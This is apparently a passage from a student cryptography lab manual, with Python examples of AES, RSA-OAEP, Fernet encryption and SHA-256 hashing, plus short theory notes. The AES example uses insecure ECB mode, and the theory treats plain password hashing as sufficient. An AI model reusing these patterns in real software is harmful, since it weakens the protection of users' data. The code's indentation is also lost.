return get_random_bytes(16) # For AES-128, use 16 bytes (128 bits) key

def encrypt(plain_text, key):

cipher = AES.new(key, AES.MODE_ECB)
 padded_data = pad(plain_text.encode('utf-8'), AES.block_size)
encrypted_data = cipher.encrypt(padded_data)
return encrypted_data

def decrypt(encrypted_data, key):

cipher = AES.new(key, AES.MODE_ECB)
decrypted_data = cipher.decrypt(encrypted_data)
unpadded_data = unpad(decrypted_data, AES.block_size)
return unpadded_data.decode('utf-8')

# Example usage:
if __name__ == "__main__":
key = generate_key()
plain_text = "Hello, this is an AES encryption example in Python!"

encrypted_data = encrypt(plain_text, key)

print("Encrypted:", encrypted_data.hex())

decrypted_text = decrypt(encrypted_data, key)

print("Decrypted:", decrypted_text)

Output :

Asymmetric -

Code
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding

# Generate RSA key pair

private_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
)
# Serialize private key to PEM format
private_pem = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption()
)

# Serialize public key to PEM format

public_pem = private_key.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
# Example plaintext
message = b"Hello, RSA!"

# Encrypt the message using RSA public key

encrypted_message = private_key.public_key().encrypt(
message,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
# Decrypt the encrypted message using RSA private key
decrypted_message = private_key.decrypt(
encrypted_message,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
print("Original Message:", message)
print("Encrypted Message:", encrypted_message)
print("Decrypted Message:", decrypted_message)

Output
Experiment No 10

Aim - Symmetric Encryption and Hashing.

Learning Objective - Understand the principles and applications of symmetric encryption for secure data
transmission, and grasp the concepts of hashing for data integrity verification.

Course Objectives -

Theory :
Symmetric Encryption:
Symmetric encryption involves the use of a single secret key to both encrypt and decrypt data. This
means that the same key is used for both the encryption of plaintext (original data) and the decryption
of ciphertext (encrypted data). The key must be kept confidential and shared securely between the
parties involved.
Here's how symmetric encryption works:

● Encryption: The plaintext is transformed into ciphertext using an encryption algorithm and the
secret key. The resulting ciphertext is unintelligible without the key.

● Decryption: To retrieve the original plaintext, the recipient uses the same key to decrypt the
ciphertext. The decryption algorithm reverses the encryption process, converting the ciphertext
back into plaintext.

● Examples of symmetric encryption algorithms include Advanced Encryption Standard (AES), Data
Encryption Standard (DES), and Triple DES (3DES).

Hashing:
Hashing, on the other hand, is a one-way function that converts input data (often called a message) into
a fixed-length string of characters, which is typically a hexadecimal number. The resulting string is known
as a hash value or hash code.
Hashing is commonly used for data integrity verification and password storage:

● Data Integrity Verification: Hashing is used to generate hash values for files or messages. By
comparing hash values before and after transmission or storage, one can detect if the data has
been tampered with.
● Password Storage: Storing plain passwords in databases is insecure. Instead, systems hash
passwords and store the hash values. When a user logs in, their input is hashed and compared to
the stored hash to authenticate them.

Learning Outcome :
Conclusion:
Code :

from cryptography.fernet import Fernet

import hashlib

# Symmetric Encryption
def encrypt_message(key, message):
cipher_suite = Fernet(key)
encrypted_message = cipher_suite.encrypt(message.encode())
return encrypted_message

def decrypt_message(key, encrypted_message):

cipher_suite = Fernet(key)
decrypted_message = cipher_suite.decrypt(encrypted_message).decode()
return decrypted_message

# Hashing
def hash_message(message):
sha256 = hashlib.sha256()
sha256.update(message.encode())
hashed_message = sha256.hexdigest()
return hashed_message

if __name__ == "__main__":
# Symmetric Encryption
key = Fernet.generate_key()
message = "This is a secret message."

encrypted_message = encrypt_message(key, message)

decrypted_message = decrypt_message(key, encrypted_message)

print(f"Original Message: {message}")

print(f"Encrypted Message: {encrypted_message}")
print(f"Decrypted Message: {decrypted_message}")

# Hashing
message_to_hash = "Hash this message."
hashed_message = hash_message(message_to_hash)

print(f"Message to Hash: {message_to_hash}")

print(f"Hashed Message: {hashed_message}")

Output :

Learning Outcome :
Conclusion: